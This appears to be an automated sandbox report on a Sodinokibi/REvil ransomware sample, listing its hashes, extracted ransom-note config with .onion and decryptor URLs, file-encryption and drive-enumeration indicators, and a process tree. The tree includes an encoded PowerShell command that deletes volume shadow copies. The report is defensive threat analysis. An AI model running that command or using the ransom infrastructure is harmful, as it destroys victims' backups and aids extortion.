Analysis
-
max time kernel
117s -
max time network
129s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
24-01-2022 00:40
Static task
static1
Behavioral task
behavioral1
Sample
fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe
Resource
win10-en-20211208
General
-
Target
fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe
-
Size
125KB
-
MD5
997717946529844208dace3d0b1ed237
-
SHA1
a9845dacc58b6e542bd4972395da06d096246f79
-
SHA256
fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93
-
SHA512
25b10392315106a234c1d8881200724576acba6d6beb7684dceb2aeeae749d2a55c210988ce93195a2e96904f1e13fc23ac77fd4f750cc375a792aad4d61124a
Malware Config
Extracted
C:\k3fzcjjz0-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/30D5E548A0E9A7A4
http://decryptor.cc/30D5E548A0E9A7A4
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exedescription ioc process File renamed C:\Users\Admin\Pictures\SetExit.crw => \??\c:\users\admin\pictures\SetExit.crw.k3fzcjjz0 fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File renamed C:\Users\Admin\Pictures\UnprotectSubmit.crw => \??\c:\users\admin\pictures\UnprotectSubmit.crw.k3fzcjjz0 fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File renamed C:\Users\Admin\Pictures\UpdateUninstall.tif => \??\c:\users\admin\pictures\UpdateUninstall.tif.k3fzcjjz0 fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File renamed C:\Users\Admin\Pictures\BlockSkip.crw => \??\c:\users\admin\pictures\BlockSkip.crw.k3fzcjjz0 fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File renamed C:\Users\Admin\Pictures\BlockSync.png => \??\c:\users\admin\pictures\BlockSync.png.k3fzcjjz0 fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File renamed C:\Users\Admin\Pictures\ExpandUnlock.crw => \??\c:\users\admin\pictures\ExpandUnlock.crw.k3fzcjjz0 fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File renamed C:\Users\Admin\Pictures\GrantReceive.tiff => \??\c:\users\admin\pictures\GrantReceive.tiff.k3fzcjjz0 fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File renamed C:\Users\Admin\Pictures\MountLimit.png => \??\c:\users\admin\pictures\MountLimit.png.k3fzcjjz0 fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\users\admin\pictures\GrantReceive.tiff fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File renamed C:\Users\Admin\Pictures\TestConfirm.tif => \??\c:\users\admin\pictures\TestConfirm.tif.k3fzcjjz0 fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exedescription ioc process File opened (read-only) \??\P: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\Y: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\D: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\I: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\J: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\M: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\N: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\S: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\U: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\B: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\K: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\L: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\O: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\R: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\V: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\Z: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\H: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\Q: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\T: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\W: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\A: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\E: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\F: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\G: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened (read-only) \??\X: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\j69c5oi6m.bmp" fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe -
Drops file in Program Files directory 32 IoCs
Processes:
fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exedescription ioc process File opened for modification \??\c:\program files\RequestGrant.html fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\StopExport.zip fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\ApproveRestore.dot fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\BackupMerge.iso fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\DisconnectRequest.vbs fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\InstallClose.au3 fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\LimitRevoke.kix fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\DenyGroup.php fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\PingSkip.ppsx fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\RegisterConnect.vdw fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\OpenRemove.m3u fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\RepairUnpublish.M2TS fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\RestoreResume.wma fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\UndoUnblock.001 fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\ReceiveWatch.aifc fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\ResetUninstall.tiff fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\k3fzcjjz0-readme.txt fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\GrantDisable.AAC fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\ReadConnect.m4v fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\k3fzcjjz0-readme.txt fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File created \??\c:\program files\k3fzcjjz0-readme.txt fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\InvokeClear.M2T fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\PopRepair.m1v fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\SendCompress.AAC fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\UnblockClear.3g2 fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\GrantStop.dot fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\MergeUninstall.wdp fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\OutEdit.emf fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\PushRemove.pot fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\k3fzcjjz0-readme.txt fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File created \??\c:\program files (x86)\k3fzcjjz0-readme.txt fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe File opened for modification \??\c:\program files\RemoveWatch.odt fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exepowershell.exepid process 1624 fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe 1300 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1624 fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe Token: SeDebugPrivilege 1300 powershell.exe Token: SeBackupPrivilege 788 vssvc.exe Token: SeRestorePrivilege 788 vssvc.exe Token: SeAuditPrivilege 788 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exedescription pid process target process PID 1624 wrote to memory of 1300 1624 fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe powershell.exe PID 1624 wrote to memory of 1300 1624 fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe powershell.exe PID 1624 wrote to memory of 1300 1624 fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe powershell.exe PID 1624 wrote to memory of 1300 1624 fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe"C:\Users\Admin\AppData\Local\Temp\fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe"1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:612
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:788
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1300-56-0x000007FEFB5B1000-0x000007FEFB5B3000-memory.dmpFilesize
8KB
-
memory/1300-58-0x0000000002600000-0x0000000002602000-memory.dmpFilesize
8KB
-
memory/1300-59-0x0000000002602000-0x0000000002604000-memory.dmpFilesize
8KB
-
memory/1300-60-0x0000000002604000-0x0000000002607000-memory.dmpFilesize
12KB
-
memory/1300-57-0x000007FEF2810000-0x000007FEF336D000-memory.dmpFilesize
11.4MB
-
memory/1300-61-0x000000001B7D0000-0x000000001BACF000-memory.dmpFilesize
3.0MB
-
memory/1300-62-0x000000000260B000-0x000000000262A000-memory.dmpFilesize
124KB
-
memory/1624-55-0x0000000075AB1000-0x0000000075AB3000-memory.dmpFilesize
8KB